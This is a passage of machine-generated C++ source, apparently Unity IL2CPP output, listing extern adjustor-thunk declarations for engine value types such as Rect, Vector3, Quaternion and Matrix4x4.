GraphicsFormatUtility__cctor_m4A3699EA318A3907272B8FF97CBE4FA92910B9D8,
};
extern void ProfilerMarker__ctor_mDD68B0A8B71E0301F592AF8891560150E55699C8_AdjustorThunk (void);
extern void ProfilerMarker_Auto_m133FA724EB95D16187B37D2C8A501D7E989B1F8D_AdjustorThunk (void);
extern void AutoScope__ctor_m7F63A273E382CB6328736B6E7F321DDFA40EA9E3_AdjustorThunk (void);
extern void AutoScope_Dispose_mED763F3F51261EF8FB79DB32CD06E0A3F6C40481_AdjustorThunk (void);
extern void JobHandle_Complete_mDCED35A125AAB37EDDAB2E31C805B4904B614A4A_AdjustorThunk (void);
extern void JobHandle_get_IsCompleted_m834D40CA77C5F2EC575592BD5DEB60B66ACCF941_AdjustorThunk (void);
extern void JobScheduleParameters__ctor_m5FFED3B28A1FA2C3EC7D1C50A7D7E788C411CE04_AdjustorThunk (void);
extern void Keyframe__ctor_mECF144086B28785BE911A22C06194A9E0FBF3C34_AdjustorThunk (void);
extern void Keyframe__ctor_m0E7D85642F12A3DAFA1768351CC7670648C41AB2_AdjustorThunk (void);
extern void Keyframe_get_time_mB8886F64CBB373936C0C25C4C68397C05779F661_AdjustorThunk (void);
extern void Keyframe_set_time_m98F165193486C0DF1611B562016595B18052A2D6_AdjustorThunk (void);
extern void Keyframe_get_value_m53E6B7609086AAAA46E24BAF734EF08E16A3FD6C_AdjustorThunk (void);
extern void Keyframe_set_value_m396D6040A4AB72ED5B9797E8C92DD806FA6F5431_AdjustorThunk (void);
extern void Keyframe_set_inTangent_m4CBBDDEE23D6E1E498580A6E1C2661E57CD38363_AdjustorThunk (void);
extern void Keyframe_set_outTangent_m68F2F86E292344CAB2600787D244019B95A89DFE_AdjustorThunk (void);
extern void BoundingSphere__ctor_mB76812ECBDD8BA5B3E246871C58F6FA6CA2061C7_AdjustorThunk (void);
extern void Bounds__ctor_mAF7B238B9FBF90C495E5D7951760085A93119C5A_AdjustorThunk (void);
extern void Bounds_GetHashCode_m59C79B529D33866FE45FEFC0C69FBD3B4AC7E172_AdjustorThunk (void);
extern void Bounds_Equals_m93E0B9D24C73E57A6FABB9D312101D48183C88CC_AdjustorThunk (void);
extern void Bounds_Equals_m615135524315743D29633C33B6C8B16B754266DB_AdjustorThunk (void);
extern void Bounds_get_center_m5B05F81CB835EB6DD8628FDA24B638F477984DC3_AdjustorThunk (void);
extern void Bounds_set_center_m891869DD5B1BEEE2D17907BBFB7EB79AAE44884B_AdjustorThunk (void);
extern void Bounds_get_size_m0699A53A55A78B3201D7270D6F338DFA91B6FAD4_AdjustorThunk (void);
extern void Bounds_set_size_m950CFB68CDD1BF409E770509A38B958E1AE68128_AdjustorThunk (void);
extern void Bounds_get_extents_mFE6DC407FCE2341BE2C750CB554055D211281D25_AdjustorThunk (void);
extern void Bounds_set_extents_m09496358547B86A93EFE7BE6371E7A6FE937C46F_AdjustorThunk (void);
extern void Bounds_get_min_m465AC9BBE1DE5D8E8AD95AC19B9899068FEEBB13_AdjustorThunk (void);
extern void Bounds_get_max_m6446F2AB97C1E57CA89467B9DE52D4EB61F1CB09_AdjustorThunk (void);
extern void Bounds_SetMinMax_mB5F7DDF18EDB7F3F25FA6D2B36824F28978C540F_AdjustorThunk (void);
extern void Bounds_Encapsulate_m1FCA57C58536ADB67B85A703470C6F5BFB837C2F_AdjustorThunk (void);
extern void Bounds_Encapsulate_m7C70C382B9380A8C962074C78E189B53CE8F7A22_AdjustorThunk (void);
extern void Bounds_ToString_m1BCCCC8C6455A77DE5C964968C33305EF7A4A0D2_AdjustorThunk (void);
extern void Bounds_ToString_m085531A8E800327829FCD48DEA671A4A0B8D21CA_AdjustorThunk (void);
extern void Plane_get_normal_mA161D94E6F7327BC111007C880B76E1731729EFB_AdjustorThunk (void);
extern void Plane__ctor_m2BFB65EBFF51123791878684ECC375B99FAD10A2_AdjustorThunk (void);
extern void Plane_Raycast_mC6D25A732413A2694A75CB0F2F9E75DEDDA117F0_AdjustorThunk (void);
extern void Plane_ToString_mF0A98DAF2E4FA36A98B68F015A4DE507D8BB3B5A_AdjustorThunk (void);
extern void Plane_ToString_mE12B74C757E52A84BE921DF2E758A36E97A11DDA_AdjustorThunk (void);
extern void Ray__ctor_mE298992FD10A3894C38373198385F345C58BD64C_AdjustorThunk (void);
extern void Ray_get_origin_m97604A8F180316A410DCD77B7D74D04522FA1BA6_AdjustorThunk (void);
extern void Ray_get_direction_m21C2D22D3BD4A683BD4DC191AB22DD05F5EC2086_AdjustorThunk (void);
extern void Ray_GetPoint_mAF4E1D38026156E6434EF2BED2420ED5236392AF_AdjustorThunk (void);
extern void Ray_ToString_m06274331D92120539B4C6E0D3747EE620DB468E5_AdjustorThunk (void);
extern void Ray_ToString_mA76F7B86876505F674F3E20C18C8258103622C10_AdjustorThunk (void);
extern void Rect__ctor_m18C3033D135097BEE424AAA68D91C706D2647F23_AdjustorThunk (void);
extern void Rect__ctor_m503705FE0E4E413041E3CE7F09270489F401C675_AdjustorThunk (void);
extern void Rect__ctor_m5665723DD0443E990EA203A54451B2BB324D8224_AdjustorThunk (void);
extern void Rect_get_x_mB267B718E0D067F2BAE31BA477647FBF964916EB_AdjustorThunk (void);
extern void Rect_set_x_mAB91AB71898A20762BC66FD0723C4C739C4C3406_AdjustorThunk (void);
extern void Rect_get_y_mC733E8D49F3CE21B2A3D40A1B72D687F22C97F49_AdjustorThunk (void);
extern void Rect_set_y_mDE91F4B98A6E8623EFB1250FF6526D5DB5855629_AdjustorThunk (void);
extern void Rect_get_position_m9B7E583E67443B6F4280A676E644BB0B9E7C4E38_AdjustorThunk (void);
extern void Rect_set_position_m9CD8AA25A83A7A893429C0ED56C36641202C3F05_AdjustorThunk (void);
extern void Rect_get_center_mAA9A2E1F058B2C9F58E13CC4822F789F42975E5C_AdjustorThunk (void);
extern void Rect_set_center_m1BFC7584EEE9EF6C9AC2CA8459300FE23D5CE86F_AdjustorThunk (void);
extern void Rect_get_min_mD0D1BABF9C955D2D9CCA86E257B0783ACDEE69AC_AdjustorThunk (void);
extern void Rect_set_min_m6557D7D73C6F115CA7C92E38C88EA9E95FC89253_AdjustorThunk (void);
extern void Rect_get_max_m60149158D9A01113214BB417AA48CEF774899167_AdjustorThunk (void);
extern void Rect_set_max_mAD2D6D5DC1F5A6E69A0A0BD7E34C209F91C381F0_AdjustorThunk (void);
extern void Rect_get_width_m620D67551372073C9C32C4C4624C2A5713F7F9A9_AdjustorThunk (void);
extern void Rect_set_width_m93B6217CF3EFF89F9B0C81F34D7345DE90B93E5A_AdjustorThunk (void);
extern void Rect_get_height_mE1AA6C6C725CCD2D317BD2157396D3CF7D47C9D8_AdjustorThunk (void);
extern void Rect_set_height_mD00038E6E06637137A5626CA8CD421924005BF03_AdjustorThunk (void);
extern void Rect_get_size_mFB990FFC0FE0152179C8C74A59E4AC258CB44267_AdjustorThunk (void);
extern void Rect_set_size_m346E4F7077E5A1C0F4E21966232CD726CB9E6BAA_AdjustorThunk (void);
extern void Rect_get_xMin_mE89C40702926D016A633399E20DB9501E251630D_AdjustorThunk (void);
extern void Rect_set_xMin_mA873FCFAF9EABA46A026B73CA045192DF1946F19_AdjustorThunk (void);
extern void Rect_get_yMin_mB19848FB25DE61EDF958F7A22CFDD86DE103062F_AdjustorThunk (void);
extern void Rect_set_yMin_m9F780E509B9215A9E5826178CF664BD0E486D4EE_AdjustorThunk (void);
extern void Rect_get_xMax_m2339C7D2FCDA98A9B007F815F6E2059BA6BE425F_AdjustorThunk (void);
extern void Rect_set_xMax_m97C28D468455A6D19325D0D862E80A093240D49D_AdjustorThunk (void);
extern void Rect_get_yMax_mBC37BEE1CD632AADD8B9EAF9FE3BA143F79CAF8E_AdjustorThunk (void);
extern void Rect_set_yMax_mCF452040E0068A4B3CB15994C0B4B6AD4D78E04B_AdjustorThunk (void);
extern void Rect_Contains_mAB270D6B7E3B0009A50D142C569D63E8FE59F48B_AdjustorThunk (void);
extern void Rect_Contains_mB1160CD465F3E9616AA4EED72AFFD611BD8D2B6B_AdjustorThunk (void);
extern void Rect_Overlaps_m5A540A24DAD3327006A3A2E209CC17992173B572_AdjustorThunk (void);
extern void Rect_Overlaps_m3F0BA2C8BB81491978B21EB21C8A6D3BBED02E41_AdjustorThunk (void);
extern void Rect_GetHashCode_m8E55539476EA6B7A6E0CEC5F980227CD15B778F1_AdjustorThunk (void);
extern void Rect_Equals_mD7EB2046512E4A46524A7ED929F1C38A32C408F8_AdjustorThunk (void);
extern void Rect_Equals_mE725DE506D3F1DB92F58B876BDA42AACD4D991B5_AdjustorThunk (void);
extern void Rect_ToString_m7BF74645745862DA4751965D0899F94376F77F10_AdjustorThunk (void);
extern void Rect_ToString_mA9EB8EC6A2E940240E0D0ECFA103B9B7EFB3D532_AdjustorThunk (void);
extern void RectInt_get_x_mA1E7EF6DEAD2E900D7D56B7A3957C05081EBA9CA_AdjustorThunk (void);
extern void RectInt_set_x_m2D2F3A87E9899A29444DBDD0BB11CB19F13AA075_AdjustorThunk (void);
extern void RectInt_get_y_m440422264E6FCAA91E01F81486A78037AC29D878_AdjustorThunk (void);
extern void RectInt_set_y_m45D5C1D817698266BED66D41A705956A1571858D_AdjustorThunk (void);
extern void RectInt_get_width_m6B7B2FB764EAE83B7F63E7F77FA33973606761A7_AdjustorThunk (void);
extern void RectInt_set_width_mCD96AA9D096114147F8411A340CE4AD3476DCD4C_AdjustorThunk (void);
extern void RectInt_get_height_mE25FB938714942D7A3BA0B3C21BC5CB913D5709C_AdjustorThunk (void);
extern void RectInt_set_height_m823A353A80B8B5180AEDF968A6E85B9D9B75C1C6_AdjustorThunk (void);
extern void RectInt_get_xMin_mA5FB5AF1133380E080CF750D21327DE27EADEE1B_AdjustorThunk (void);
extern void RectInt_get_yMin_m6914C2254158DF797E20E381626DC08A2700147B_AdjustorThunk (void);
extern void RectInt_get_xMax_mBA05CE52847E3D3CB8295055706B3E0D4350E9F0_AdjustorThunk (void);
extern void RectInt_get_yMax_mAE5D758A1241F7722F8FB9B46861583F76C8FE44_AdjustorThunk (void);
extern void RectInt__ctor_m6E8B3A6C7EE11257A6B438E36274116FE39B5B42_AdjustorThunk (void);
extern void RectInt_Overlaps_m9E82E1C8BFDA3297221E5FDC8B8773AD3F50C4EE_AdjustorThunk (void);
extern void RectInt_ToString_m7EC8BB4830459B8CF5BF3032E9A526A6EE18D386_AdjustorThunk (void);
extern void RectInt_ToString_m7EAE8CA8D77B7D6DDD46B61D670C71046006B92F_AdjustorThunk (void);
extern void RectInt_Equals_mE9EA164664CA30C1C099EFB658D691F55A793B96_AdjustorThunk (void);
extern void Resolution_ToString_m058CE120CC83F314D0C8D4A706F9AA068BC9CF34_AdjustorThunk (void);
extern void RenderTextureDescriptor_get_width_mB159E4EB08B23B19CCCFADB465864361FB840BFF_AdjustorThunk (void);
extern void RenderTextureDescriptor_set_width_m3B2494007BFE3AD4D14403407C9B24F5045E7E10_AdjustorThunk (void);
extern void RenderTextureDescriptor_get_height_m1006F9AA45029715C552C8A8C2F102F63D3A91EC_AdjustorThunk (void);
extern void RenderTextureDescriptor_set_height_m1FE41111472DAA9B5E80FFAF3445004D72A3CFA5_AdjustorThunk (void);
extern void RenderTextureDescriptor_get_msaaSamples_mFCC33643AFF2265C8305DCFD79ED8774A1A8FA22_AdjustorThunk (void);
extern void RenderTextureDescriptor_set_msaaSamples_m6910E09489372746391B14FBAF59A7237539D6C4_AdjustorThunk (void);
extern void RenderTextureDescriptor_get_volumeDepth_m528818299E101F1B285B08BE12FAC2F9A871BA36_AdjustorThunk (void);
extern void RenderTextureDescriptor_set_volumeDepth_mEF9610D1C14182417A01B7243DEE6B559A13B34D_AdjustorThunk (void);
extern void RenderTextureDescriptor_set_mipCount_mDCC85ED7D97BD64A290A21DB91BC5CB1C4BA95EF_AdjustorThunk (void);
extern void RenderTextureDescriptor_get_graphicsFormat_m50F25A4F179EA318C8D3B0D8685F9C5F59F7DEC0_AdjustorThunk (void);
extern void RenderTextureDescriptor_set_graphicsFormat_m037DA25F9A8B956D830C7B7E5C6E258DC1133A13_AdjustorThunk (void);
extern void RenderTextureDescriptor_get_depthStencilFormat_m360929BE5BD10E9C3D8C936AA6B44B1D11C119CB_AdjustorThunk (void);
extern void RenderTextureDescriptor_set_depthStencilFormat_m7EC335006743B59AAD1895AD06B2DD74333F9A03_AdjustorThunk (void);
extern void RenderTextureDescriptor_get_depthBufferBits_mC095E36F9803B2E68E258C03E48ACD0B0E678953_AdjustorThunk (void);
extern void RenderTextureDescriptor_set_depthBufferBits_mA3710C0D6E485BA6465B328CD8B1954F0E4C5819_AdjustorThunk (void);
extern void RenderTextureDescriptor_set_dimension_mCE9A4A08454BB2D9DFE3E505EC336FD480078F39_AdjustorThunk (void);
extern void RenderTextureDescriptor_set_shadowSamplingMode_m4B4CE918DFFF1CC5E3AF981456E186F15FC5DB93_AdjustorThunk (void);
extern void RenderTextureDescriptor_set_vrUsage_m994CB3D4B250A70BE005D9FDFD24D868E07A52F0_AdjustorThunk (void);
extern void RenderTextureDescriptor_set_memoryless_m9ECE149930C0E2629A5CD9DA1CD0EA2A01FFE1B2_AdjustorThunk (void);
extern void RenderTextureDescriptor__ctor_m8B0D32DC550540B5546891C2F6300F384D6FE692_AdjustorThunk (void);
extern void RenderTextureDescriptor__ctor_m8F8897C63F614AEA4348A95293C911C1293DA3A4_AdjustorThunk (void);
extern void RenderTextureDescriptor_SetOrClearRenderTextureCreationFlag_m4C08C7A3F715426EBECA2B983361908D097C6424_AdjustorThunk (void);
extern void RenderTextureDescriptor_set_createdFromScript_mEE28DED1D3C20DA025A0C44E1C2A531685194F23_AdjustorThunk (void);
extern void RenderTextureDescriptor_set_useDynamicScale_m9335866C8754D51235D391E84F8972C4C518844A_AdjustorThunk (void);
extern void Color__ctor_m3786F0D6E510D9CFA544523A955870BD2A514C8C_AdjustorThunk (void);
extern void Color__ctor_mCD6889CDE39F18704CD6EA8E2EFBFA48BA3E13B0_AdjustorThunk (void);
extern void Color_ToString_m0018DE2184B3377CCA6FBD72D5D47886DC669147_AdjustorThunk (void);
extern void Color_ToString_mC29251805A0B629C1483DAE7A5BBAAC722B319D2_AdjustorThunk (void);
extern void Color_ToString_m70AEF3634C556F6AA01FC3236226C3D27C277229_AdjustorThunk (void);
extern void Color_GetHashCode_m2981EEA1DEFE55254945D7D03BE64D4F56BA58D0_AdjustorThunk (void);
extern void Color_Equals_m24E409BF329F25774C6577F18EFD3DE1253684D6_AdjustorThunk (void);
extern void Color_Equals_mD297CAFFEBE9352C940873862FDF9A28F1F02435_AdjustorThunk (void);
extern void Color_RGBMultiplied_m4B3BAE4310EA98451D608E0300331012AFFF1B01_AdjustorThunk (void);
extern void Color_get_linear_m76EB88E15DA4E00D615DF33D1CEE51092683117C_AdjustorThunk (void);
extern void Color_get_maxColorComponent_m97D2940D48767ACC21D76F8CCEAD6898B722529C_AdjustorThunk (void);
extern void Color32__ctor_mC9C6B443F0C7CA3F8B174158B2AF6F05E18EAC4E_AdjustorThunk (void);
extern void Color32_ToString_mB1EFBF981F901A76ABF2FEA19EB290A2D8CAFC32_AdjustorThunk (void);
extern void Color32_ToString_m263D34787852D176627FC2B910DFE9CABAF26696_AdjustorThunk (void);
extern void Matrix4x4_GetLossyScale_m3C19D2C6746BB211C8CB02478A60EB2D71D10FC7_AdjustorThunk (void);
extern void Matrix4x4_get_lossyScale_mFB3D4CF6408D710D607CA1D2AF94B2E4E0B57EB7_AdjustorThunk (void);
extern void Matrix4x4_get_inverse_m4F4A881CD789281EA90EB68CFD39F36C8A81E6BD_AdjustorThunk (void);
extern void Matrix4x4__ctor_m6523044D700F15EC6BCD183633A329EE56AA8C99_AdjustorThunk (void);
extern void Matrix4x4_get_Item_mE4D45E661CAD3C54A02156B25F5D10585F250227_AdjustorThunk (void);
extern void Matrix4x4_get_Item_m771C2EE3A3BFFBAC9F2AD07FFCAAF6146C1BE92A_AdjustorThunk (void);
extern void Matrix4x4_GetHashCode_m313B1AF4FEA792BB7E4D1D239EBE3257F825914D_AdjustorThunk (void);
extern void Matrix4x4_Equals_m35CFC5F304BB40EFFE011B92AA87B77CD8FF8F74_AdjustorThunk (void);
extern void Matrix4x4_Equals_mDB0C4CCC58BE3E108F1A40BE8DBDCD62E284CC51_AdjustorThunk (void);
extern void Matrix4x4_GetColumn_m5CE079D7A69DE70E3144BADD20A1651C73A8D118_AdjustorThunk (void);
extern void Matrix4x4_GetRow_m59C6981300C6F6927BEA17C5D095B2AD29629E9F_AdjustorThunk (void);
extern void Matrix4x4_MultiplyPoint_m20E910B65693559BFDE99382472D8DD02C862E7E_AdjustorThunk (void);
extern void Matrix4x4_MultiplyPoint3x4_mACCBD70AFA82C63DA88555780B7B6B01281AB814_AdjustorThunk (void);
extern void Matrix4x4_MultiplyVector_mFD12F86A473E90BBB0002149ABA3917B2A518937_AdjustorThunk (void);
extern void Matrix4x4_ToString_mB310BE20B7CDE8AEA91D84FCA4E75BCACF7DFC86_AdjustorThunk (void);
extern void Matrix4x4_ToString_m33E7675EAEB7F6E9DA08C49185B92063D967C7A2_AdjustorThunk (void);
extern void Matrix4x4_ToString_mB8E1EFF14A37605ABA321708CC36021FFBCF84CF_AdjustorThunk (void);
extern void Vector3_get_Item_m163510BFC2F7BFAD1B601DC9F3606B799CF199F2_AdjustorThunk (void);
extern void Vector3_set_Item_m79136861DEC5862CE7EC20AB3B0EF10A3957CEC3_AdjustorThunk (void);
extern void Vector3__ctor_m376936E6B999EF1ECBE57D990A386303E2283DE0_AdjustorThunk (void);
extern void Vector3__ctor_m5F87930F9B0828E5652E2D9D01ED907C01122C86_AdjustorThunk (void);
extern void Vector3_Scale_mE0DC2C1B7902271788591F17DBE7F7F72EC37283_AdjustorThunk (void);
extern void Vector3_GetHashCode_mB08429DC931A85BD29CE11B9ABC77DE7E0E46327_AdjustorThunk (void);
extern void Vector3_Equals_mB4BE43D5986864F5C22B919F2957E0309F10E3B4_AdjustorThunk (void);
extern void Vector3_Equals_mEDEAF86793D229455BBF9BA5B30DDF438D6CABC1_AdjustorThunk (void);
extern void Vector3_Normalize_mC749B887A4C74BA0A2E13E6377F17CCAEB0AADA8_AdjustorThunk (void);
extern void Vector3_get_normalized_m736BBF65D5CDA7A18414370D15B4DFCC1E466F07_AdjustorThunk (void);
extern void Vector3_get_magnitude_mF0D6017E90B345F1F52D1CC564C640F1A847AF2D_AdjustorThunk (void);
extern void Vector3_get_sqrMagnitude_m43C27DEC47C4811FB30AB474FF2131A963B66FC8_AdjustorThunk (void);
extern void Vector3_ToString_m6C24B9F0382D25D75B05C606E127CD14660574EE_AdjustorThunk (void);
extern void Vector3_ToString_m3185BD544ED9BA81E88936544EC298C19207BDF1_AdjustorThunk (void);
extern void Vector3_ToString_mA8DA39B6324392BB93203A4D4CB85AF87231CB62_AdjustorThunk (void);
extern void Quaternion__ctor_m868FD60AA65DD5A8AC0C5DEB0608381A8D85FCD8_AdjustorThunk (void);
extern void Quaternion_get_eulerAngles_m2DB5158B5C3A71FD60FC8A6EE43D3AAA1CFED122_AdjustorThunk (void);
extern void Quaternion_get_normalized_m08AB963B13A0EC6F540A29886C5ACFCCCC0A6D16_AdjustorThunk (void);
extern void Quaternion_GetHashCode_m5F55C34C98E437376595E722BE4EB8A70434F049_AdjustorThunk (void);
extern void Quaternion_Equals_mCF93B00BA4FCDDE6100918451343DB9A0583A0A0_AdjustorThunk (void);
extern void Quaternion_Equals_m25B95D8412B79CC7F8B34062BFAE662BD99578BE_AdjustorThunk (void);
extern void Quaternion_ToString_mC5BD5DEF60FCA4A38924462A5C4440ECFCF934C4_AdjustorThunk (void);
extern void Quaternion_ToString_m57FD902CB5D5FDE30866C169033515B5330B3C5F_AdjustorThunk (void);
extern void Quaternion_ToString_m9B592D577B3FDB892CA53ABF3457BC2EDE45DF8C_AdjustorThunk (void);
extern void Vector2_get_Item_m18BC65BB0512B16A1F9C8BE4B83A3E7BBAD7064D_AdjustorThunk (void);
extern void Vector2_set_Item_mEF309880B9B3B370B542AABEB32256EEC589DD03_AdjustorThunk (void);
extern void Vector2__ctor_m9525B79969AFFE3254B303A40997A56DEEB6F548_AdjustorThunk (void);
extern void Vector2_Normalize_m56DABCAB5967DF37A6B96710477D3660D800C652_AdjustorThunk (void);
extern void Vector2_get_normalized_mF6722883AEFB5027690A778DF8ACC20F0FA65297_AdjustorThunk (void);
extern void Vector2_ToString_mB47B29ECB21FA3A4ACEABEFA18077A5A6BBCCB27_AdjustorThunk (void);
extern void Vector2_ToString_m5F3C7B1C542DAF4CE90DDAB02A633AB0A3B08A05_AdjustorThunk (void);
extern void Vector2_ToString_mC10F098442E56919947154402A77EDE28DC9B7BE_AdjustorThunk (void);
extern void Vector2_GetHashCode_mED8670C0E122B7ED0DAB4C3381ADFF04B75E0B03_AdjustorThunk (void);
extern void Vector2_Equals_mA4E81D6FCE503DBD502BA499708344410F60DA4E_AdjustorThunk (void);
extern void Vector2_Equals_mDF84D5ED14E018609C6A9C9BAE016C1B33BCFF4C_AdjustorThunk (void);
extern void Vector2_get_magnitude_m5C59B4056420AEFDB291AD0914A3F675330A75CE_AdjustorThunk (void);
extern void Vector2_get_sqrMagnitude_mA16336720C14EEF8BA9B55AE33B98C9EE2082BDC_AdjustorThunk (void);
extern void Vector2Int_get_x_mA2CACB1B6E6B5AD0CCC32B2CD2EDCE3ECEB50576_AdjustorThunk (void);
extern void Vector2Int_set_x_m291ECF246536852F0B8EE049C4A3768E4999CDC8_AdjustorThunk (void);
extern void Vector2Int_get_y_m48454163ECF0B463FB5A16A0C4FC4B14DB0768B3_AdjustorThunk (void);
extern void Vector2Int_set_y_mF81881204EEE272BA409728C7EBFDE3A979DDF6A_AdjustorThunk (void);
extern void Vector2Int__ctor_mC20D1312133EB8CB63EC11067088B043660F11CE_AdjustorThunk (void);
extern void Vector2Int_Equals_m6D91EFAA6B3254334436BD262A4547EA08281BA3_AdjustorThunk (void);
extern void Vector2Int_Equals_m32811BA0576C096D5EB5C0CFD8231478F17229A6_AdjustorThunk (void);
extern void Vector2Int_GetHashCode_mA3B6135FA770AF0C171319B50D9B913657230EB7_AdjustorThunk (void);
extern void Vector2Int_ToString_m6F7E9B9B45A473FED501EB8B8B25BA1FE26DD5D4_AdjustorThunk (void);
extern void Vector2Int_ToString_m44BA6941AEF41076A39848B95DDEFEA88A094B5E_AdjustorThunk (void);
extern void Vector4_get_Item_mB1D001A235857569E479FB799EF77C52391D19EF_AdjustorThunk (void);
extern void Vector4_set_Item_mF24782F861A16BB0436C2262FA916B4EE69998A6_AdjustorThunk (void);
extern void Vector4__ctor_m96B2CD8B862B271F513AF0BDC2EABD58E4DBC813_AdjustorThunk (void);
extern void Vector4_GetHashCode_m53F6FCA56A0051C9D1AB41AA3EAA2C86CDAA8B92_AdjustorThunk (void);
extern void Vector4_Equals_mC2596CA0F441D25DE7A9419BE66A8FA2DA355CB9_AdjustorThunk (void);
extern void Vector4_Equals_m73FAA65A1A565EE28D6C9385603829894B7D4392_AdjustorThunk (void);
extern void Vector4_get_normalized_mD7671F6DCE4C1A80243139B87858FF65F4B865A3_AdjustorThunk (void);
extern void Vector4_get_magnitude_m97A83FC484190F07D8017F4BD10E3C81478E0D20_AdjustorThunk (void);
extern void Vector4_get_sqrMagnitude_m864A2908BCF9E060BA73DE3DD259EC06F47F913C_AdjustorThunk (void);
extern void Vector4_ToString_mFA0DDF34C1E394F75EF65E06764A1BE750E7F388_AdjustorThunk (void);
extern void Vector4_ToString_m2BE67BEBBD3059C9CEE29BF34AD30E1D7057E914_AdjustorThunk (void);
extern void PropertyName__ctor_mFA341118B63F88B69464A6F1DF248B569686D778_AdjustorThunk (void);
extern void PropertyName__ctor_m9F28B1DA9CEDDEAA6663C795456B9F5E95CAE92F_AdjustorThunk (void);
extern void PropertyName_GetHashCode_m7D4B878BA78625CDD78C9B045B5EADFDBF94C378_AdjustorThunk (void);
extern void PropertyName_Equals_mFD87005C352B7BEB4279560B1A489409B0692143_AdjustorThunk (void);
extern void PropertyName_Equals_m7D00F3B148E65210A82101C31F1F217C9527113E_AdjustorThunk (void);
extern void PropertyName_ToString_mDE271855F7B9A516185A66E12D90FE6B6C9DF6C0_AdjustorThunk (void);
extern void LayerMask_get_value_m70CBE32210A1F0FD4ECB850285DA90ED57B87974_AdjustorThunk (void);
extern void RangeInt_get_end_m5835FBEB410CB8AC0928AEFD95728A9AD57F6C63_AdjustorThunk (void);
extern void RangeInt__ctor_m3CB91E79C7B5AED97E564581025B2F66778B7CBE_AdjustorThunk (void);
extern void WorkRequest__ctor_m78DC33ED88BF9BA29E05D2180B2ADC439132F1F5_AdjustorThunk (void);
extern void WorkRequest_Invoke_mBFEC6A3799BAFDE7ED840A0523D3D56160C03921_AdjustorThunk (void);
extern void Pose__ctor_m15CA45808A2BBF1956E836D22C387FAB80BED051_AdjustorThunk (void);
extern void Pose_ToString_m4F33190911B86A9B72CA59D6AF3C633569CDE6D2_AdjustorThunk (void);
extern void Pose_ToString_m8C3203B81EB15980F16E07C63B6FBBEECE50A6EF_AdjustorThunk (void);
extern void Pose_GetTransformedBy_m8B18A1ED205791F95CDC1D1F2A08A42D6DA02CBF_AdjustorThunk (void);
extern void Pose_GetTransformedBy_mB4C9FECEC5701B761A0E8CB2A8BC76D8E2FFDFCF_AdjustorThunk (void);
extern void Pose_get_forward_m510527153754B6C2B2CDFDEE25D7168E3C82372A_AdjustorThunk (void);
extern void Pose_get_right_m8518E7BCEB74B9798BADB001B9E38756CC35ECFE_AdjustorThunk (void);
extern void Pose_get_up_m5431E350242BEBB0CD7B0AAF9DC9468DC6DDFE5C_AdjustorThunk (void);
extern void Pose_Equals_mE6D1524E4DDAAF86BF685A00FE9DCE0908A2A9D6_AdjustorThunk (void);
extern void Pose_Equals_m31979E7A46252DBB620F4A0EA3BDBA61782DA498_AdjustorThunk (void);
extern void Pose_GetHashCode_mDD6C48FABC18795F04F82D42DFCBC916C0C6CCDB_AdjustorThunk (void);
extern void DrivenRectTransformTracker_Add_mC0CE417831BF58E6DA81770CE5E2A99B142EEFEC_AdjustorThunk (void);
extern void DrivenRectTransformTracker_Clear_m9A7F5130E4007F70B14AB1FF13A2997C073A64EE_AdjustorThunk (void);
extern void DebugScreenCapture_set_rawImageDataReference_mB19FBA997F9FDDE05F33ECDF900F299DEFB7001D_AdjustorThunk (void);
extern void DebugScreenCapture_set_imageFormat_m375ECF2BFAC85011D5493B7DE5676B2EC3BA1DFB_AdjustorThunk (void);
extern void DebugScreenCapture_set_width_m1200EF0961699A652475F0590BE8D65A583F01A1_AdjustorThunk (void);
extern void DebugScreenCapture_set_height_m1798855FA1504E5092D6345264322E4D21B6C2A0_AdjustorThunk (void);
extern void MovedFromAttributeData_Set_m155005FB8BCE0569C40B02D75FFADB3FBDB7EEDD_AdjustorThunk (void);
extern void Scene_get_handle_mD508BE60333C6168610E12CECAB12E9B11C25E53_AdjustorThunk (void);
extern void Scene_get_path_mACD61B36E1F010A9FCA2C62637E0CB24B16729E4_AdjustorThunk (void);
extern void Scene_get_buildIndex_m82B6E0C96C85C952B7A2D794DB73CDA99AA9A57E_AdjustorThunk (void);
extern void Scene_GetHashCode_m74ACBFB8C656D5620A9A1E62D04E55ACBF63ADC9_AdjustorThunk (void);
extern void Scene_Equals_mB973481492F291BF8EAF1AD66B9F7FA3ACF3928D_AdjustorThunk (void);
extern void LoadSceneParameters__ctor_m40C160638049BF7577055B3460968F8B73459380_AdjustorThunk (void);
extern void PlayerLoopSystem_ToString_m259B8533D2C64C15D381B16F32C710A0018684A0_AdjustorThunk (void);
extern void VertexAttributeDescriptor_get_attribute_m2F7C7084857741A39E9FF0D4BABF98F9C7018AAA_AdjustorThunk (void);
extern void VertexAttributeDescriptor_set_attribute_m526ED099EEA12DCB2FCB1BC88445FBF921E850A2_AdjustorThunk (void);
extern void VertexAttributeDescriptor_get_format_mF8EF98F3E047BC26D177C3A008BCDAF979E52C79_AdjustorThunk (void);
extern void VertexAttributeDescriptor_set_format_mCA82263EBD7802621D9ECE42D0F44D4AAECD46C5_AdjustorThunk (void);
extern void VertexAttributeDescriptor_get_dimension_mAB440DDFA08BF61D717547EC8B9C43C3DFC56FB8_AdjustorThunk (void);
extern void VertexAttributeDescriptor_set_dimension_mEF4325AE27221C732B214354A2DEB044ACFC69EE_AdjustorThunk (void);
extern void VertexAttributeDescriptor_get_stream_mAA4D41E2B4B9024161B176700100ADB27855E4FF_AdjustorThunk (void);
extern void VertexAttributeDescriptor_set_stream_m9A3991AA0365A1DCEDF80A61990F7B48913A1C0A_AdjustorThunk (void);
extern void VertexAttributeDescriptor__ctor_m713B31395FB13FDEB2665F5C4C31572D5875A43A_AdjustorThunk (void);
extern void VertexAttributeDescriptor_ToString_m45F7E7D6715E000C617173246F2C9BE23DF3FC8F_AdjustorThunk (void);
extern void VertexAttributeDescriptor_GetHashCode_mCB8C5F6AD422FE6A410C5406843FCE4B0ED5F2F8_AdjustorThunk (void);
extern void VertexAttributeDescriptor_Equals_m6FBFEE42E1BAAAC2D38434EDF0906C5B76D56BE5_AdjustorThunk (void);
extern void VertexAttributeDescriptor_Equals_mF328DE139864C201987238048AC79F8925CA435D_AdjustorThunk (void);
extern void RenderTargetIdentifier__ctor_mBB94C5581CCD259EC11AAFA68C151B35E5C72C4F_AdjustorThunk (void);
extern void RenderTargetIdentifier_ToString_mA0B5CBC27159C4257939A5CAC6CEACE65AA6D36A_AdjustorThunk (void);
extern void RenderTargetIdentifier_GetHashCode_m255E1EFD7BFC22B1B4464F9EF3346386DA328B86_AdjustorThunk (void);
